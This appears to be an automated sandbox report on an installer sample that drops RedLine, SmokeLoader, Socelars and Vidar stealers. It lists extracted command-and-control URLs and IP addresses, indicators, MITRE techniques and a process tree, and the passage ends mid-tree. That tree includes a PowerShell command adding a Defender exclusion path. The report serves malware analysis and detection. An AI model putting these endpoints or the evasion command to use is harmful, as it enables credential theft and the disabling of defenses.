redline | 8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e

Resubmissions

13-09-2021 13:00

210913-p826aadfh4 10

12-09-2021 18:18

210912-wxzpcafeel 10

Analysis

max time kernel
21s
max time network
162s
platform
windows10_x64
resource
win10v20210408
submitted
13-09-2021 13:00

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

3.4MB
MD5

7279aeead22b91c8176ee932377f2e27
SHA1

169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
SHA256

8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
SHA512

8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697

Score

10^/10

redline smokeloader socelars vidar 129f4t 706 uts aspackv2 backdoor infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

129f4t

185.215.113.104:18754

Extracted

Family

redline

Botnet

UTS

45.9.20.20:13441

Signatures

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	4888	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6108	4888	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	4888	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6620	4888	schtasks.exe	121

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral3/memory/3316-289-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral3/memory/3316-290-0x000000000041C5DA-mapping.dmp	family_redline
behavioral3/memory/2972-303-0x0000000003390000-0x00000000033AF000-memory.dmp	family_redline
behavioral3/memory/2972-307-0x0000000003550000-0x000000000356E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
behavioral3/files/0x000100000001ab45-149.dat	family_socelars
behavioral3/files/0x000100000001ab45-167.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/3228-203-0x00000000034F0000-0x00000000035C1000-memory.dmp	family_vidar
behavioral3/memory/3228-201-0x0000000000400000-0x00000000017F4000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral3/files/0x000100000001ab3f-121.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab3f-123.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab3e-122.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab3e-128.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab3e-127.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab41-126.dat	aspack_v212_v242
behavioral3/files/0x000100000001ab41-131.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 30 IoCs

Processes:

setup_installer.exesetup_install.exeSun15d8dfe2c6d17.exeSun150faeb3537d.exeSun1584240df9fe73a3.exeSun157a449716c8ee483.exeSun15b61bf18b0f1.exeSun152260a303c33a7.exeSun15223697c98.exeSun150d896340a863.exeSun157ff8e4440aa.exeSun15b61bf18b0f1.tmpLzmwAqmV.exe5047182.exeChrome 5.exePublicDwlBrowser1100.exe737992.exe2.exesetup.exeudptest.exesetup_2.exe46807GHF____.exe3002.exesetup_2.tmpjhuuee.exe1271845.exe1271845.exesvchost.exeBearVpn 3.exe1650891.exe

pid	Process
4840	setup_installer.exe
4904	setup_install.exe
4208	Sun15d8dfe2c6d17.exe
4008	Sun150faeb3537d.exe
4228	Sun1584240df9fe73a3.exe
4248	Sun157a449716c8ee483.exe
4284	Sun15b61bf18b0f1.exe
4268	Sun152260a303c33a7.exe
4252	Sun15223697c98.exe
3228	Sun150d896340a863.exe
3196	Sun157ff8e4440aa.exe
500	Sun15b61bf18b0f1.tmp
2372	LzmwAqmV.exe
2792	5047182.exe
3980	Chrome 5.exe
4076	PublicDwlBrowser1100.exe
3836	737992.exe
4576	2.exe
4660	setup.exe
2972	udptest.exe
4724	setup_2.exe
4044	46807GHF____.exe
648	3002.exe
5028	setup_2.tmp
4276	jhuuee.exe
3232	1271845.exe
3316	1271845.exe
3320	svchost.exe
4760	BearVpn 3.exe
3296	1650891.exe

Loads dropped DLL 9 IoCs

Processes:

setup_install.exeSun15b61bf18b0f1.tmpsetup_2.tmp

pid	Process
4904	setup_install.exe
4904	setup_install.exe
4904	setup_install.exe
4904	setup_install.exe
4904	setup_install.exe
4904	setup_install.exe
4904	setup_install.exe
500	Sun15b61bf18b0f1.tmp
5028	setup_2.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

737992.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	737992.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
192	ipinfo.io
278	ipinfo.io
297	ipinfo.io
412	ipinfo.io
94	ip-api.com
143	ipinfo.io
145	ipinfo.io
173	ipinfo.io
7	ip-api.com
411	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

Processes:

1271845.exe

description	pid	Process	procid_target
PID 3232 set thread context of 3316	3232	1271845.exe	112

Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
5096	4576	WerFault.exe	98
4272	4248	WerFault.exe	83
2764	4660	WerFault.exe	99
4036	3232	WerFault.exe	108
4848	4248	WerFault.exe	83
4692	4660	WerFault.exe	99
3952	4248	WerFault.exe	83
3468	4660	WerFault.exe	99
2376	4660	WerFault.exe	99
4728	4660	WerFault.exe	99
5012	4248	WerFault.exe	83
3340	4660	WerFault.exe	99
5736	4248	WerFault.exe	83
5868	4248	WerFault.exe	83

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Sun15223697c98.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
4004	schtasks.exe
5136	schtasks.exe
1208	schtasks.exe
7692	schtasks.exe
7144	schtasks.exe
6620	schtasks.exe
7424	schtasks.exe
2292	schtasks.exe
9372	schtasks.exe
6732	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
4712	timeout.exe

Kills process with taskkill 11 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4668	taskkill.exe
8220	taskkill.exe
9040	taskkill.exe
6536	taskkill.exe
5460	taskkill.exe
7344	taskkill.exe
7368	taskkill.exe
972	taskkill.exe
9292	taskkill.exe
8728	taskkill.exe
4192	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Sun150faeb3537d.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun150faeb3537d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun150faeb3537d.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXE

pid	Process
8232	PING.EXE
9340	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	144	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	150	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	172	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Sun15223697c98.exepowershell.exeWerFault.exeWerFault.exe

pid	Process
4252	Sun15223697c98.exe
4252	Sun15223697c98.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
2900
2900
2900
2900
2900
2900
4200	powershell.exe
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
5096	WerFault.exe
2900
2900
2900
2900
5096	WerFault.exe
5096	WerFault.exe
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
2900
4036	WerFault.exe
4036	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Sun15223697c98.exe

pid	Process
4252	Sun15223697c98.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

Processes:

Sun150faeb3537d.exeSun157ff8e4440aa.exeSun1584240df9fe73a3.exepowershell.exe5047182.exe2.exePublicDwlBrowser1100.exe1271845.exesvchost.exeWerFault.exeWerFault.exeWerFault.exesetup_2.tmpBearVpn 3.exe

description	pid	Process
Token: SeCreateTokenPrivilege	4008	Sun150faeb3537d.exe
Token: SeAssignPrimaryTokenPrivilege	4008	Sun150faeb3537d.exe
Token: SeLockMemoryPrivilege	4008	Sun150faeb3537d.exe
Token: SeIncreaseQuotaPrivilege	4008	Sun150faeb3537d.exe
Token: SeMachineAccountPrivilege	4008	Sun150faeb3537d.exe
Token: SeTcbPrivilege	4008	Sun150faeb3537d.exe
Token: SeSecurityPrivilege	4008	Sun150faeb3537d.exe
Token: SeTakeOwnershipPrivilege	4008	Sun150faeb3537d.exe
Token: SeLoadDriverPrivilege	4008	Sun150faeb3537d.exe
Token: SeSystemProfilePrivilege	4008	Sun150faeb3537d.exe
Token: SeSystemtimePrivilege	4008	Sun150faeb3537d.exe
Token: SeProfSingleProcessPrivilege	4008	Sun150faeb3537d.exe
Token: SeIncBasePriorityPrivilege	4008	Sun150faeb3537d.exe
Token: SeCreatePagefilePrivilege	4008	Sun150faeb3537d.exe
Token: SeCreatePermanentPrivilege	4008	Sun150faeb3537d.exe
Token: SeBackupPrivilege	4008	Sun150faeb3537d.exe
Token: SeRestorePrivilege	4008	Sun150faeb3537d.exe
Token: SeShutdownPrivilege	4008	Sun150faeb3537d.exe
Token: SeDebugPrivilege	4008	Sun150faeb3537d.exe
Token: SeAuditPrivilege	4008	Sun150faeb3537d.exe
Token: SeSystemEnvironmentPrivilege	4008	Sun150faeb3537d.exe
Token: SeChangeNotifyPrivilege	4008	Sun150faeb3537d.exe
Token: SeRemoteShutdownPrivilege	4008	Sun150faeb3537d.exe
Token: SeUndockPrivilege	4008	Sun150faeb3537d.exe
Token: SeSyncAgentPrivilege	4008	Sun150faeb3537d.exe
Token: SeEnableDelegationPrivilege	4008	Sun150faeb3537d.exe
Token: SeManageVolumePrivilege	4008	Sun150faeb3537d.exe
Token: SeImpersonatePrivilege	4008	Sun150faeb3537d.exe
Token: SeCreateGlobalPrivilege	4008	Sun150faeb3537d.exe
Token: 31	4008	Sun150faeb3537d.exe
Token: 32	4008	Sun150faeb3537d.exe
Token: 33	4008	Sun150faeb3537d.exe
Token: 34	4008	Sun150faeb3537d.exe
Token: 35	4008	Sun150faeb3537d.exe
Token: SeDebugPrivilege	3196	Sun157ff8e4440aa.exe
Token: SeDebugPrivilege	4228	Sun1584240df9fe73a3.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	2792	5047182.exe
Token: SeDebugPrivilege	4576	2.exe
Token: SeDebugPrivilege	4076	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	3232	1271845.exe
Token: SeDebugPrivilege	3320	svchost.exe
Token: SeDebugPrivilege	5096	WerFault.exe
Token: SeRestorePrivilege	4272	WerFault.exe
Token: SeBackupPrivilege	4272	WerFault.exe
Token: SeBackupPrivilege	4272	WerFault.exe
Token: SeShutdownPrivilege	2900
Token: SeCreatePagefilePrivilege	2900
Token: SeDebugPrivilege	4036	WerFault.exe
Token: SeDebugPrivilege	2764	setup_2.tmp
Token: SeDebugPrivilege	4272	WerFault.exe
Token: SeDebugPrivilege	4760	BearVpn 3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeSun15b61bf18b0f1.exe

description	pid	Process	procid_target
PID 4796 wrote to memory of 4840	4796	setup_x86_x64_install.exe	68
PID 4796 wrote to memory of 4840	4796	setup_x86_x64_install.exe	68
PID 4796 wrote to memory of 4840	4796	setup_x86_x64_install.exe	68
PID 4840 wrote to memory of 4904	4840	setup_installer.exe	69
PID 4840 wrote to memory of 4904	4840	setup_installer.exe	69
PID 4840 wrote to memory of 4904	4840	setup_installer.exe	69
PID 4904 wrote to memory of 5072	4904	setup_install.exe	72
PID 4904 wrote to memory of 5072	4904	setup_install.exe	72
PID 4904 wrote to memory of 5072	4904	setup_install.exe	72
PID 4904 wrote to memory of 5084	4904	setup_install.exe	73
PID 4904 wrote to memory of 5084	4904	setup_install.exe	73
PID 4904 wrote to memory of 5084	4904	setup_install.exe	73
PID 4904 wrote to memory of 5100	4904	setup_install.exe	76
PID 4904 wrote to memory of 5100	4904	setup_install.exe	76
PID 4904 wrote to memory of 5100	4904	setup_install.exe	76
PID 4904 wrote to memory of 4104	4904	setup_install.exe	75
PID 4904 wrote to memory of 4104	4904	setup_install.exe	75
PID 4904 wrote to memory of 4104	4904	setup_install.exe	75
PID 4904 wrote to memory of 3272	4904	setup_install.exe	74
PID 4904 wrote to memory of 3272	4904	setup_install.exe	74
PID 4904 wrote to memory of 3272	4904	setup_install.exe	74
PID 4904 wrote to memory of 1448	4904	setup_install.exe	77
PID 4904 wrote to memory of 1448	4904	setup_install.exe	77
PID 4904 wrote to memory of 1448	4904	setup_install.exe	77
PID 4904 wrote to memory of 1520	4904	setup_install.exe	78
PID 4904 wrote to memory of 1520	4904	setup_install.exe	78
PID 4904 wrote to memory of 1520	4904	setup_install.exe	78
PID 4904 wrote to memory of 3600	4904	setup_install.exe	80
PID 4904 wrote to memory of 3600	4904	setup_install.exe	80
PID 4904 wrote to memory of 3600	4904	setup_install.exe	80
PID 4904 wrote to memory of 3468	4904	setup_install.exe	79
PID 4904 wrote to memory of 3468	4904	setup_install.exe	79
PID 4904 wrote to memory of 3468	4904	setup_install.exe	79
PID 4904 wrote to memory of 3708	4904	setup_install.exe	81
PID 4904 wrote to memory of 3708	4904	setup_install.exe	81
PID 4904 wrote to memory of 3708	4904	setup_install.exe	81
PID 5072 wrote to memory of 4200	5072	cmd.exe	82
PID 5072 wrote to memory of 4200	5072	cmd.exe	82
PID 5072 wrote to memory of 4200	5072	cmd.exe	82
PID 5100 wrote to memory of 4208	5100	cmd.exe	92
PID 5100 wrote to memory of 4208	5100	cmd.exe	92
PID 5100 wrote to memory of 4208	5100	cmd.exe	92
PID 3468 wrote to memory of 4228	3468	cmd.exe	91
PID 3468 wrote to memory of 4228	3468	cmd.exe	91
PID 3600 wrote to memory of 4008	3600	cmd.exe	90
PID 3600 wrote to memory of 4008	3600	cmd.exe	90
PID 3600 wrote to memory of 4008	3600	cmd.exe	90
PID 1448 wrote to memory of 4252	1448	cmd.exe	89
PID 1448 wrote to memory of 4252	1448	cmd.exe	89
PID 1448 wrote to memory of 4252	1448	cmd.exe	89
PID 3708 wrote to memory of 4248	3708	cmd.exe	83
PID 3708 wrote to memory of 4248	3708	cmd.exe	83
PID 3708 wrote to memory of 4248	3708	cmd.exe	83
PID 5084 wrote to memory of 4268	5084	cmd.exe	88
PID 5084 wrote to memory of 4268	5084	cmd.exe	88
PID 3272 wrote to memory of 4284	3272	cmd.exe	84
PID 3272 wrote to memory of 4284	3272	cmd.exe	84
PID 3272 wrote to memory of 4284	3272	cmd.exe	84
PID 1520 wrote to memory of 3196	1520	cmd.exe	87
PID 1520 wrote to memory of 3196	1520	cmd.exe	87
PID 4104 wrote to memory of 3228	4104	cmd.exe	86
PID 4104 wrote to memory of 3228	4104	cmd.exe	86
PID 4104 wrote to memory of 3228	4104	cmd.exe	86
PID 4284 wrote to memory of 500	4284	Sun15b61bf18b0f1.exe	85

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4840
- - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5084
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun152260a303c33a7.exe
        
        Sun152260a303c33a7.exe
        5⤵
        Executes dropped EXE
        
        PID:4268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3272
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15b61bf18b0f1.exe
        
        Sun15b61bf18b0f1.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4284
      - C:\Users\Admin\AppData\Local\Temp\is-DL02G.tmp\Sun15b61bf18b0f1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DL02G.tmp\Sun15b61bf18b0f1.tmp" /SL5="$3005E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15b61bf18b0f1.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:500
        
        C:\Users\Admin\AppData\Local\Temp\is-VUMVC.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VUMVC.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Executes dropped EXE
        
        PID:4044
        
        C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe
        
        "C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\is-TDTRN.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TDTRN.tmp\ultramediaburner.tmp" /SL5="$202BC,281924,62464,C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:5676
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\34-304a2-ecc-35fbc-2df30a417f7f4\Nalogoreqa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\34-304a2-ecc-35fbc-2df30a417f7f4\Nalogoreqa.exe"
        8⤵
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\10-860e3-98b-789b4-f02fef6b6d125\Kipimoqebu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10-860e3-98b-789b4-f02fef6b6d125\Kipimoqebu.exe"
        8⤵
        
        PID:5968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exe & exit
        9⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exe
        
        C:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exe
        10⤵
        
        PID:6232
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exe /eufive
        10⤵
        
        PID:6812
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631285987 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe & exit
        9⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe
        
        C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe
        10⤵
        
        PID:800
        
        C:\Users\Admin\AppData\Local\Temp\is-4BOGF.tmp\SmartPDF.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4BOGF.tmp\SmartPDF.tmp" /SL5="$3021E,138429,56832,C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe"
        11⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\is-ULD73.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ULD73.tmp\Setup.exe" /Verysilent
        12⤵
        
        PID:5768
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
        13⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\Live2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Live2.exe"
        14⤵
        
        PID:3272
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        13⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\is-ID3D0.tmp\stats.tmp
        
